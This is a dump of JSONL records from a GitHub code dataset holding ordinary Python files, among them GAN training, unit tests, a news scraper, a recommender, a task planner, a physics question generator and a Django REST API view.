os.makedirs(args.img_save_dir, exist_ok=True)\n os.makedirs(args.model_save_dir, exist_ok=True)\n os.makedirs(opj(args.img_save_dir, \"A2B\"), exist_ok=True)\n os.makedirs(opj(args.img_save_dir, \"B2A\"), exist_ok=True)\n return args\n\ndef main_worker(args, logger):\n train_loader, valid_loader = get_dataloader(args)\n args.total_iter = args.n_epochs * len(train_loader)\n logger.write(f\"[Train] # of imgs A : {train_loader.dataset.n_A}, # of imgs B : {train_loader.dataset.n_B}\")\n logger.write(f\"[Valid] # of imgs A : {valid_loader.dataset.n_A}, # of imgs B : {valid_loader.dataset.n_B}\")\n logger.write(f\"1 epoch = {len(train_loader)} iters\")\n model = AttentionCycleGAN(args)\n cur_iter = 1\n start_time = time.time()\n for epoch in range(args.start_epoch, args.n_epochs+1):\n loss_G_meter = AverageMeter()\n loss_D_meter = AverageMeter()\n for data in train_loader:\n img_A = data['img_A'].cuda(args.local_rank)\n img_B = data[\"img_B\"].cuda(args.local_rank)\n model.set_input(img_A, img_B)\n model.train(epoch)\n\n BS = img_A.shape[0]\n loss_G_meter.update(model.loss_G.item(), BS)\n loss_D_meter.update(model.loss_D.item(), BS)\n if cur_iter % args.log_save_iter_freq == 0:\n msg = f\"[iter - {cur_iter}/{args.total_iter}]_[time - {time.time() - start_time:.2f}sec]_[loss G - {loss_G_meter.avg:.4f}]_[loss D - {loss_D_meter.avg:.4f}]\"\n logger.write(msg)\n if cur_iter % args.img_save_iter_freq <= args.n_save_images:\n real_A_img = tensor2img(img_A)\n real_B_img = tensor2img(img_B)\n gene_A_img = tensor2img(model.gene_A)\n gene_B_img = tensor2img(model.gene_B)\n attn_A_img = tensor2img(model.attn_A_viz)\n attn_B_img = tensor2img(model.attn_B_viz)\n A2B_to_path = opj(args.img_save_dir, \"A2B\", f\"{cur_iter}_{cur_iter % args.img_save_iter_freq}.png\")\n A2B_save_img = np.concatenate([real_A_img, real_B_img, gene_B_img, attn_A_img], axis=1)\n if args.local_rank == 0:\n cv2.imwrite(A2B_to_path, A2B_save_img[:,:,::-1])\n \n B2A_to_path = opj(args.img_save_dir, \"B2A\", f\"{cur_iter}_{cur_iter % args.img_save_iter_freq}.png\")\n B2A_save_img = np.concatenate([real_B_img, real_A_img, gene_A_img, attn_B_img], axis=1)\n if args.local_rank == 0:\n cv2.imwrite(B2A_to_path, 
B2A_save_img[:,:,::-1])\n \n if cur_iter % args.model_save_iter_freq == 0:\n to_path = opj(args.model_save_dir, f\"[iter - {cur_iter}].pth\")\n model.save(to_path)\n cur_iter += 1\n model.scheduler_G.step()\n model.scheduler_D.step()\n G_lr_val = get_lr(model.optimizer_G)\n D_lr_val = get_lr(model.optimizer_D)\n msg = f\"[Epoch - {epoch}/{args.n_epochs}]_[time - {time.time() - start_time:.2f}sec]_[loss G - {loss_G_meter.avg:.4f}]_[loss D - {loss_D_meter.avg:.4f}]_[G lr - {G_lr_val}]_[D lr - {D_lr_val}]\"\n logger.write(msg)\n \n\nif __name__ == \"__main__\":\n args = build_args()\n logger = Logger(args.local_rank)\n logger.open(\"asd.txt\")\n print_args(args, logger)\n save_args(args, args.config_path)\n if args.use_DDP:\n torch.cuda.set_device(args.local_rank)\n dist.init_process_group(backend=\"nccl\")\n main_worker(args, logger)\n \n","repo_name":"rlawjdghek/Generative_Models","sub_path":"GANs/Attention_CycleGAN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33551585682","text":"from pndni import forceqform\nimport nibabel\nimport numpy as np\nimport pytest\n\n\ndef test_ang():\n x = np.array([1.0, 0.0, 0.0])\n y = np.array([0.0, 2.0, 0.0])\n z = np.array([0.0, 0.0, 3.0])\n for i in [x, y, z]:\n for j in [x, y, z]:\n if i is j:\n assert np.allclose(forceqform._ang(i, j), np.pi / 2)\n else:\n assert np.allclose(forceqform._ang(i, j), 0)\n\n\ndef test_check_ang():\n R1 = np.array([[1.0, -2.0, 0.0],\n [1.0, 2.0, 0.0],\n [0.0, 0.0, 3.0]])\n forceqform._check_ang(R1, 1e-6)\n R2 = np.array([[1.0, 0.0, 0.0],\n [1.0, 2.0, 0.0],\n [0.0, 0.0, 3.0]])\n with pytest.raises(RuntimeError):\n forceqform._check_ang(R2, 1e-6)\n with pytest.raises(RuntimeError):\n forceqform._check_ang(R2, np.pi / 4 - 0.01)\n forceqform._check_ang(R2, np.pi / 4 + 0.01)\n\n\n@pytest.mark.parametrize('testtype,shear,maxang', [('qform', False, None),\n ('sform', False, None),\n ('both', False, None),\n ('none', False, None),\n ('sform', True, None),\n ('sform', True, np.pi)])\ndef test_forceqform(tmp_path, testtype, shear, maxang):\n i1 = tmp_path / 'image1.nii'\n affine = np.array([[1.0, 0.0, 0.0, -20.0],\n [0.0, 2.0, 0.0, -30.0],\n [0.0, 0.0, 4.0, -40.0],\n [0.0, 0.0, 0.0, 1.0]])\n if shear:\n affine[0, 2] = 2.0\n img = np.arange(24).reshape(2, 3, 4)\n nii = nibabel.Nifti1Image(img, None)\n\n if testtype == 'qform':\n nii.set_qform(affine)\n elif testtype == 'sform':\n nii.set_sform(affine)\n elif testtype == 'both':\n nii.set_qform(affine)\n nii.set_sform(affine * 2)\n elif testtype == 'none':\n pass\n else:\n raise RuntimeError()\n nii.to_filename(str(i1))\n parser = forceqform.get_parser()\n toparse = [str(i1), str(tmp_path / 'out.nii')]\n if maxang is not None:\n toparse.extend(['--maxangle', str(maxang)])\n args = parser.parse_args(toparse)\n if testtype != 'none' and not (shear and maxang is None):\n forceqform.forceqform(args.input_file, args.output_file, maxangle=args.maxangle)\n else:\n with pytest.raises(RuntimeError):\n forceqform.forceqform(args.input_file, args.output_file, maxangle=args.maxangle)\n return\n nout = nibabel.load(str(args.output_file))\n if maxang is None:\n assert np.all(nout.affine == affine)\n assert np.all(nout.get_qform() == affine)\n assert nout.get_sform(coded=True)[1] == 
0\n","repo_name":"pndni/pndni_utils","sub_path":"tests/test_forceqform.py","file_name":"test_forceqform.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3912065472","text":"import pprint\nimport pygame\nimport time\nimport queue\n\nclass PS4Controller(object):\n \"\"\"Class representing the PS4 controller. Pretty straightforward functionality.\"\"\"\n\n controller = None\n axis_data = None\n button_data = None\n hat_data = None\n mailbox = None\n debug = 0\n\n def init(self, mailbox):\n \"\"\"Initialize the joystick components\"\"\"\n pygame.init()\n pygame.joystick.init()\n self.controller = pygame.joystick.Joystick(0)\n self.controller.init()\n self.mailbox = mailbox\n\n def listen(self):\n \"\"\"Listen for events to happen\"\"\"\n \n if not self.axis_data:\n self.axis_data = {}\n\n if not self.button_data:\n self.button_data = {}\n for i in range(self.controller.get_numbuttons()):\n self.button_data[i] = False\n\n if not self.hat_data:\n self.hat_data = {}\n for i in range(self.controller.get_numhats()):\n self.hat_data[i] = (0, 0)\n\n while True:\n time.sleep(.1)\n for event in pygame.event.get():\n if event.type == pygame.JOYAXISMOTION:\n self.axis_data[event.axis] = round(event.value,2)\n elif event.type == pygame.JOYBUTTONDOWN:\n self.button_data[event.button] = True\n if event.button == 0:\n self.mailbox.put(\"square\")\n elif event.button == 1:\n self.mailbox.put(\"cross\")\n elif event.button == 2:\n self.mailbox.put(\"circle\")\n elif event.button == 3:\n self.mailbox.put(\"triangle\")\n elif event.button == 4:\n self.mailbox.put(\"L1\")\n elif event.button == 5:\n self.mailbox.put(\"R1\")\n elif event.button == 8:\n self.mailbox.put(\"select\")\n elif event.button == 9:\n self.mailbox.put(\"start\")\n #0: square\n #1: cross\n #2: circle\n #3: triangle\n #4: L1\n #5: R1\n #8: Share\n #9: Options\n if self.debug == 1: print(event.button)\n elif event.type == pygame.JOYBUTTONUP:\n self.button_data[event.button] = False\n elif event.type == pygame.JOYHATMOTION:\n self.hat_data[event.hat] = event.value\n\nif __name__ == \"__main__\":\n ps4 = PS4Controller()\n ps4.init(queue.Queue())\n ps4.debug = 1\n ps4.listen()\n","repo_name":"dhruvm96/SocialDrones","sub_path":"cfcli/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31066122461","text":"with open(r\"D:\\New folder\\files\\New folder\\Python\\Day 13\\iris.csv\", \"r\") as iris_file:\r\n iris_data = iris_file.readlines()\r\n print(iris_data)\r\n\r\nirises = []\r\n\r\nfor row in iris_data[1:]:\r\n sepal_length, sepal_width, petal_length, petal_width, species = row.strip().split(\",\")\r\n\r\n irises.append({\r\n \"sepal_length\": sepal_length,\r\n \"sepal_width\": sepal_width,\r\n \"petal_length\": petal_length,\r\n \"petal_width\": petal_width,\r\n \"species\": species\r\n })\r\n\r\n\r\n#alternative way\r\nwith open(\"iris.csv\", \"r\") as iris_file:\r\n iris_data = iris_file.readlines()\r\n\r\nheaders = iris_data[0].strip().split(\",\")\r\nirises = []\r\n\r\nfor row in iris_data[1:]:\r\n iris = row.strip().split(\",\")\r\n iris_dict = dict(zip(headers, iris))\r\n\r\n irises.append(iris_dict)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"imxal/Python","sub_path":"Day 
13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"33321811259","text":"\"\"\"\nRoutine for extracting news from the Google News tab given a search string and start and end days.\n\n\"\"\"\nimport datetime as DT\nimport logging\nimport os\nimport time\nfrom datetime import date\nfrom os import path\n\nimport pandas as pd\nfrom GoogleNews import GoogleNews\n\nfrom noticias_ner import config\nfrom noticias_ner.noticias.google import extrai_noticias_google\n\n\ndef __extrai_noticias_gnews(q, dia_inicio, dia_fim, num_limite_paginas=1, lang='pt-BR', sleep=1, tentativas=5):\n \"\"\"\n Returns a data frame with the news obtained from the Google News tab\n\n Parameters\n ----------\n q : str\n Search string\n\n dia_inicio, dia_fim : datetime.Date\n Start and end dates for the search\n\n num_limite_paginas : int\n Maximum number of pages to fetch.\n\n lang : str\n Language code for the search (default pt-BR)\n\n sleep : int\n Number of seconds to wait between attempts after each page-fetch error\n\n tentativas : int\n Number of attempts to fetch a page before considering the extraction finished\n\n Returns\n -------\n resultados : DataFrame\n Dataframe with the search results\n \"\"\"\n\n # Search string properly formatted for a URL\n # q = urllib.parse.quote(q)\n\n # Date strings in the format expected by the GoogleNews lib\n formato_data = '%m/%d/%Y'\n dia_inicio_formatado = dia_inicio.strftime(formato_data)\n dia_fim_formatado = dia_fim.strftime(formato_data)\n\n # Instantiate the Google News search interface with the pt-BR language and the requested period\n gn = GoogleNews(lang=lang, start=dia_inicio_formatado, end=dia_fim_formatado)\n\n # Initialize the list that stores the search results\n resultados = []\n\n # Fetch the first page\n logger = logging.getLogger('covidata')\n logger.info('Fetching page 1')\n gn.search(q)\n resultados = resultados + gn.result()\n gn.clear()\n\n # For page 2 onwards (p2 corresponds to index 1)\n for i in range(2, num_limite_paginas + 1):\n\n logger.info(f'Fetching page {i}')\n\n # Fetch the page\n gn.getpage(i)\n\n # Append the results to the list\n resultados = resultados + gn.result()\n\n # If the page query produced no results\n if gn.result() == []:\n logger.info(f'The query for page {i} returned no results')\n\n # Decrease the attempt counter\n tentativas = tentativas - 1\n logger.info(f'*** {tentativas} attempts remaining ***')\n\n # If the number of attempts reached zero, stop the extraction\n if tentativas < 1:\n break\n\n # Otherwise\n else:\n # Pause the script for sleep seconds before fetching the next page\n logger.info(f'Execution paused for {sleep} seconds')\n time.sleep(sleep)\n\n # Clear the cached result\n gn.clear()\n\n # Build and return the dataframe\n return pd.DataFrame(resultados)\n\n\ndef executar_busca(data_inicial, q):\n dia_inicio = __get_dia_inicio(data_inicial)\n dia_fim = date.today()\n\n # Page limit\n num_limite_paginas = 100\n\n df_google = extrai_noticias_google(q, dia_inicio)\n\n # Run the search\n df_gnews = __extrai_noticias_gnews(q, dia_inicio, dia_fim, num_limite_paginas=num_limite_paginas, sleep=10,\n tentativas=10)\n\n # Save the results\n if not path.exists(config.diretorio_dados):\n os.makedirs(config.diretorio_dados)\n\n df = 
pd.concat([df_google, df_gnews])\n caminho_arquivo_resultante = os.path.join(config.diretorio_dados, f'noticias_n_{len(df)}.xlsx')\n\n df.to_excel(caminho_arquivo_resultante)\n\n return caminho_arquivo_resultante, dia_inicio\n\n\ndef __get_dia_inicio(data_inicial):\n if not data_inicial:\n today = DT.date.today()\n dia_inicio = today - DT.timedelta(days=7)\n else:\n dia_inicio = date.fromisoformat(data_inicial)\n return dia_inicio\n","repo_name":"SecexSaudeTCU/noticias_ner","sub_path":"noticias_ner/noticias/gnews.py","file_name":"gnews.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"pt","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} {"seq_id":"71725173266","text":"\"\"\"\nEach garden can choose one of four flower types; adjacent gardens just need different types\n\nInput: n = 3, paths = [[1,2],[2,3],[3,1]]\nOutput: [1,2,3]\nExplanation:\nGardens 1 and 2 grow different types of flowers.\nGardens 2 and 3 grow different types of flowers.\nGardens 3 and 1 grow different types of flowers.\nHence, [1,2,3] is a valid answer. Other valid answers include [1,2,4], [1,4,2] and [3,2,1]\n\"\"\"\n\n\nclass Solution(object):\n def gardenNoAdj(self, N, paths):\n \"\"\"\n :type N: int\n :type paths: List[List[int]]\n :rtype: List[int]\n \"\"\"\n res = [0] * N\n neigh = [[] for _ in range(N)]\n \n # record the neighbours of every garden\n for i, j in paths:\n neigh[i - 1].append(j - 1)\n neigh[j - 1].append(i - 1)\n\n for cur in range(N):\n # flower types the current garden can still choose\n flowers = [1, 2, 3, 4]\n for j in neigh[cur]:\n if res[j] in flowers:\n flowers.remove(res[j])\n\n # any remaining type is valid, so pick the first one\n res[cur] = flowers[0]\n\n return res","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Graph/二分图bipartition(图染色法)/1042m. 不邻接植花(图染色法).py","file_name":"1042m. 不邻接植花(图染色法).py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"70134877586","text":"a = \"\\n\".join([\n \".W.\",\n \".W.\",\n \"...\"\n])\n\na = a.split('\\n')\ndef make_2d(s):\n a = s.split('\\n')\n new_a = []\n for x in a:\n new_a.append(list(x))\n return new_a\n","repo_name":"mjyrhee9/IB-Comp-Sci-Projects","sub_path":"bfs2d.py","file_name":"bfs2d.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"43517188272","text":"# There is a table A with N rows and M columns, and each cell of the table contains a single digit.\r\n#\r\n# Yeondu wants to select one or more distinct cells such that the row numbers of the selected cells form an arithmetic sequence in selection order, and the column numbers also form an arithmetic sequence in selection order. Concatenating the digits written in the selected cells in order produces an integer.\r\n#\r\n# Find the largest perfect square among the integers Yeondu can make. 
A perfect square is the square of some integer.\r\n\r\nimport math\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nN, M = map(int, input().split())\r\ntable = [input().strip() for _ in range(N)]\r\nanswer = -1\r\n\r\ndef func(x):\r\n x = int(x)\r\n num = math.sqrt(x)\r\n if int(num) * int(num) == x:\r\n return True\r\n return False\r\n\r\nif N == 1 and M == 1:\r\n result = int(''.join(map(str, table)))\r\n if func(result):\r\n print(result)\r\n else:\r\n print(answer)\r\nelse:\r\n for y in range(N):\r\n for x in range(M):\r\n for dy in range(-N + 1, N):\r\n for dx in range(-M + 1, M):\r\n num = \"\"\r\n current_y = y\r\n current_x = x\r\n if dx == 0 and dy == 0:\r\n continue\r\n while 0 <= current_x < M and 0 <= current_y < N:\r\n num += table[current_y][current_x]\r\n current_x += dx\r\n current_y += dy\r\n if func(num):\r\n answer = max(answer, int(num))\r\n print(answer)","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"1000~1999/1025.py","file_name":"1025.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"15582111383","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\n\ndef exponentialRegression(closing):\n x = np.arange(1,len(closing) + 1).reshape((-1, 1))\n y_normalized = np.divide(closing, closing[0])\n y_ln = np.log(y_normalized)\n model = LinearRegression()\n model.fit(x, y_ln)\n scalar = np.exp(model.intercept_) * closing[0]\n base = np.power(np.exp(model.coef_)[0], 252)\n # annualReturn = (base - 1) * 100\n # equation = \"y = {}({})^x\".format(scalar, base,)\n rSquared = model.score(x, y_ln)\n return {\n \"scalar\": scalar,\n \"roi\": ((base - 1) * 100),\n # \"annualReturn\": annualReturn,\n # \"equation\": equation,\n \"r2\": rSquared\n }\n","repo_name":"blakesanie/Stock-Analysis","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"36923199342","text":"import argparse\nimport movie_data\nimport content_recommender\n\n\ndef show_user_id_prompt():\n while True:\n try:\n user_id = int(input(\"Enter the desired user ID: \"))\n return user_id\n except ValueError:\n print(\"Please input integer only...\")\n\n\ndef print_user_profile(user_profile):\n sorted_profile = {k: v for k, v in sorted(user_profile.items(), key=lambda item: item[1], reverse=True)}\n for genre in sorted_profile:\n print('{0}: {1}'.format(genre, sorted_profile[genre]))\n\n\nif __name__ == \"__main__\":\n try:\n # Command line arguments\n # --user set the user_id for which to generate recommendations\n # --strategy strategy to be used in recommendation process\n # --sample set the number of randomly sampled movies used in recommendation process\n # (does not influence user profile creation)\n parser = argparse.ArgumentParser()\n parser.add_argument('--user', dest='user_id', type=int, default=-1,\n help='id of user to generate recommendations for')\n parser.add_argument('--strategy', dest='strategy', type=str, default='all',\n help='strategy to use for recommendations (overlap, popularity, count, all)')\n parser.add_argument('--sample', dest='sample_size', type=int, default=-1,\n help='set the number of randomly sampled movies used in recommendation process (does not '\n 'influence user profile creation)')\n\n args = parser.parse_args()\n # if user_id was not set via cl arguments then prompt user for input\n if args.user_id == -1:\n args.user_id = 
show_user_id_prompt()\n\n if args.strategy not in ('overlap', 'popularity', 'count', 'all'):\n raise ValueError('Strategy must be in (overlap, popularity, count, all)')\n\n print('Loading data...')\n md = movie_data.MovieData()\n # if sample size > actual movie count\n if md.get_movie_count() < args.sample_size:\n raise ValueError('Sample size must be smaller than user and movie count ({0})'\n .format(md.get_movie_count()))\n\n print('\\nUser has previously rated:')\n print(md.get_rated_movies_df(args.user_id)[['Title', 'Genres']])\n\n # create user profile and print\n recommender = content_recommender.ContentBasedRecommender(data=md, sample_size=args.sample_size)\n user_profile = recommender.get_user_profile(args.user_id)\n print('\\nUSER PROFILE:')\n print_user_profile(user_profile)\n\n print('\\nGenerating recommendations...')\n\n # recommendation strategy 1\n if args.strategy in ('overlap', 'all'):\n print('\\nRECOMMENDATIONS (OVERLAP):')\n df_recommendations = recommender.get_recommendations_overlap(args.user_id)\n print(df_recommendations[['Title', 'Genres']].head(30))\n\n # recommendation strategy 2\n if args.strategy in ('popularity', 'all'):\n print('\\nRECOMMENDATIONS (POPULARITY):')\n df_recommendations = recommender.get_recommendations_popularity(args.user_id)\n print(df_recommendations[['Title', 'Genres']].head(30))\n\n # recommendation strategy 3\n if args.strategy in ('count', 'all'):\n print('\\nRECOMMENDATIONS (COUNT):')\n df_recommendations = recommender.get_recommendations_count(args.user_id)\n print(df_recommendations[['Title', 'Genres']].head(30))\n\n except (ValueError, KeyError) as e:\n print('Error: ' + str(e))\n except:\n print('unknown error occurred')\n","repo_name":"elsantner/recommender-systems-assignments","sub_path":"assignment04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41859303670","text":"from helpers import analytics, primes\nanalytics.monitor()\n\nlimit = int(1e6)\n\ndef main(limit):\n phi = primes.totients(limit)\n return max(range(1,len(phi)), key=lambda i:i/phi[i])\n\nprint(main(limit), analytics.lap(), analytics.maxMem())","repo_name":"Phyisis/Problems","sub_path":"src/1-100/P069.py","file_name":"P069.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34609675666","text":"from distutils.core import setup\nimport os\n\nreadme_fname = os.path.join(os.path.dirname(__file__), \"README.rst\")\nreadme_text = open(readme_fname).read()\n\nsetup(name=\"ftptool\", version=\"0.7.1\",\n url=\"https://github.com/bloggse/ftptool\",\n description=\"Higher-level interface to ftplib\",\n author=\"Blogg Esse AB\",\n author_email=\"teknik@blogg.se\",\n requires=[\"six\"],\n long_description=readme_text,\n py_modules=[\"ftptool\"])\n","repo_name":"bloggse/ftptool","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"5786255722","text":"import json\n\nclass Project:\n def __init__(self, title, description, due_date):\n self.title = title\n self.description = description\n self.due_date = due_date\n self.tasks = []\n\n def add_task(self, task):\n self.tasks.append(task)\n\n def remove_task(self, task):\n self.tasks.remove(task)\n\n def complete_task(self, task):\n task.complete()\n\n def 
get_completed_tasks(self):\n return [task for task in self.tasks if task.completed]\n\n def get_incomplete_tasks(self):\n return [task for task in self.tasks if not task.completed]\n\n def display_tasks(self):\n print(\"Current tasks in the project:\")\n print(\"Title\\tDescription\\tPriority\\tStatus\")\n for task in self.tasks:\n completed = \"Completed\" if task.completed else \"Not completed\"\n print(f\"{task.title}\\t{task.description}\\t{task.priority}\\t{completed}\")\n print(\"--------------------\")\n\nclass Task:\n def __init__(self, title, description, priority, completed=False):\n self.title = title\n self.description = description\n self.priority = priority\n self.completed = completed\n\n def complete(self):\n self.completed = True\n\n def edit(self, new_title, new_description, new_priority):\n self.title = new_title\n self.description = new_description\n self.priority = new_priority\n\nclass ProjectManager:\n def __init__(self):\n self.projects = []\n\n def create_project(self, title, description, due_date):\n project = Project(title, description, due_date)\n self.projects.append(project)\n return project\n\n def remove_project(self, project):\n self.projects.remove(project)\n\n def save_projects(self, filename):\n data = []\n for project in self.projects:\n project_data = {\n \"title\": project.title,\n \"description\": project.description,\n \"due_date\": project.due_date,\n \"tasks\": [\n {\n \"title\": task.title,\n \"description\": task.description,\n \"priority\": task.priority,\n \"completed\": task.completed\n }\n for task in project.tasks\n ]\n }\n data.append(project_data)\n\n with open(filename, \"w\") as file:\n json.dump(data, file, indent=4)\n\n def load_projects(self, filename):\n with open(filename, \"r\") as file:\n data = json.load(file)\n\n self.projects = []\n for project_data in data:\n project = Project(project_data[\"title\"], project_data[\"description\"], project_data[\"due_date\"])\n for task_data in project_data[\"tasks\"]:\n task = Task(task_data[\"title\"], task_data[\"description\"], task_data[\"priority\"])\n task.completed = task_data[\"completed\"]\n project.add_task(task)\n\n self.projects.append(project)\n\ndef save_tasks(tasks, filename):\n with open(filename, 'w') as file:\n json.dump(tasks, file)\n\ndef load_tasks(filename):\n try:\n with open(filename, 'r') as file:\n return json.load(file)\n except FileNotFoundError:\n return []\n\nproject_manager = ProjectManager()\n\nproject1 = project_manager.create_project(\"Task management app\", \"A web app for tracking tasks\", \"2023-06-30\")\n\ntasks = load_tasks('tasks.json')\nfor task_data in tasks:\n task = Task(task_data['title'], task_data['description'], task_data['priority'], task_data['completed'])\n project1.add_task(task)\n\ndef add_new_task(project):\n title = input(\"Enter the task title: \")\n description = input(\"Enter the task description: \")\n priority = input(\"Enter the task priority: \")\n task = Task(title, description, priority)\n project.add_task(task)\n print(\"Added a new task:\")\n print(\"Title:\", task.title)\n print(\"Description:\", task.description)\n print(\"Priority:\", task.priority)\n print(\"--------------------\")\n\n\nwhile True:\n command = input(\"Enter a command (add - add a new task, delete - delete a task, complete - mark a task as completed, display - show the tasks, quit - exit): \")\n if command == \"add\":\n add_new_task(project1)\n elif command == \"delete\":\n task_title = input(\"Enter the title of the task to delete: \")\n 
for task in project1.tasks:\n if task.title == task_title:\n project1.remove_task(task)\n print(f\"Deleted the task titled: {task_title}\")\n break\n else:\n print(\"No task with that title was found.\")\n elif command == \"complete\":\n task_title = input(\"Enter the title of the task to mark as completed: \")\n for task in project1.tasks:\n if task.title == task_title:\n task.complete()\n print(f\"The task titled {task_title} has been marked as completed.\")\n break\n else:\n print(\"No task with that title was found.\")\n elif command == \"display\":\n project1.display_tasks()\n elif command == \"quit\":\n\n tasks = []\n for task in project1.tasks:\n task_data = {\n 'title': task.title,\n 'description': task.description,\n 'priority': task.priority,\n 'completed': task.completed\n }\n tasks.append(task_data)\n save_tasks(tasks, 'tasks.json')\n\n print(\"Program finished.\")\n break\n","repo_name":"Seppyo/planerProjektow","sub_path":"planerZadań.py","file_name":"planerZadań.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"5006077652","text":"import random\n\n# A stone of mass 0.05 kg is thrown vertically upwards. Give the direction and magnitude of the net force on the pebble,\n#(a) during its upward motion,\n#(b) during its downward motion,\n#(c) at the highest point where it is momentarily at rest. \n# Do your answers change if the pebble was thrown at an angle of 45° with the horizontal direction\n\n# Give the magnitude and direction of the net force acting on a stone of mass 0.1 kg,\n#(a) just after it is dropped from the window of a stationary train,\n#(b) just after it is dropped from the window of a train running at a constant velocity of 36 km/ h,\n#(c) just after it is dropped from the window of a train accelerating with 1 ms-2,\n#(d) lying on the floor of a train which is accelerating with 1 m s~2, the stone being at rest relative to the train.\n\n# A rocket with a lift-off mass 20,000 kg is blasted upwards with an initial acceleration of 5.0 ms-2. Calculate the initial thrust (force) of the blast.\n\nqns = open('./questions.txt', 'w') \nans = open('./answers.txt','w')\nno_of_samples = 2500000\n# no_of_samples = 30\n\nfor i in range(no_of_samples):\n type = random.randint(1,5)\n if type == 1 or type == 3:\n m = random.randint(1,200)\n v = random.randint(1,200)\n angle = random.randint(0,90)\n q = \"A stone of mass \"+str(m)+\" kg is thrown vertically upwards with a velocity of \"+str(v)+\" ms-1. 
Give the direction and magnitude of the net force on the stone,\"\n t2 = random.randint(1,3)\n if t2 == 1:\n q = q + \" during its upward motion, \"\n elif t2 == 2:\n q = q + \" during its downward motion, \"\n else:\n q = q + \" at the highest point where it is momentarily at rest, \"\n q = q + \" does the answer change if the stone was thrown at an angle of \"+str(angle)+\" degrees with the horizontal direction?\\n\"\n a = str(m*10)+\" newton; no, the answer does not change in the 2nd case either.\\n\"\n elif type == 2 or type == 4:\n m = random.randint(10,2000)\n q = \"Give the magnitude and direction of the net force acting on a stone of mass \"+str(m)+\" g,\"\n a = str(round(m/100,1))+\" newton, vertically downwards\\n\"\n t2 = random.randint(1,5)\n if t2 == 1:\n l = random.randint(100,2000)\n q = q + \" just after it is dropped from the window of a stationary train of length \"+str(l)+\" m?\\n\"\n elif t2 == 2:\n v = random.randint(1,2000)\n q = q + \" just after it is dropped from the window of a train running at a constant velocity of \"+str(v)+\" ms-1?\\n\"\n elif t2 == 3:\n acc = random.randint(1,2000)\n q = q + \" just after it is dropped from the window of a train accelerating with \"+str(acc)+\" ms-2?\\n\"\n else:\n acc = random.randint(10,2000)\n q = q + \" lying on the floor of a train which is accelerating with \"+str(acc)+\" ms-2, the stone being at rest relative to the train?\\n\"\n a = str(round((m*acc)/1000,1)) + \" newton, along the direction of motion of train\\n\"\n else:\n m = random.randint(1000,20000)\n acc = random.randint(20,300)\n q = \"A rocket with a lift-off mass \"+str(m)+\" kg is blasted upwards with an initial acceleration of \"+str(acc)+\" ms-2. Calculate the initial thrust (force) of the blast.\\n\"\n a = str(m * (acc + 10)) + \" newton\\n\"\n qns.write(q)\n ans.write(a)\n # print(q)\n # print(a)\nqns.close()\nans.close()","repo_name":"misterpawan/scimat2","sub_path":"science/LawsOfMotion/Force/Force.py","file_name":"Force.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} {"seq_id":"8579654026","text":"from django.http import Http404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .models import Personaje\nfrom .serializers import PersonajeSerializer\n\n\nclass PersonajeList(APIView):\n def get(self, request):\n personajes = Personaje.objects.all()\n serializer = PersonajeSerializer(personajes, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n serializer = PersonajeSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass PersonajeDetail(APIView):\n def get_object(self, pk):\n try:\n return Personaje.objects.get(pk=pk)\n except Personaje.DoesNotExist:\n raise Http404\n\n def get(self, request, pk):\n snippet = self.get_object(pk)\n serializer = PersonajeSerializer(snippet)\n return Response(serializer.data)\n\n def put(self, request, pk):\n snippet = self.get_object(pk)\n serializer = PersonajeSerializer(snippet, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n snippet = self.get_object(pk)\n snippet.delete()\n return 
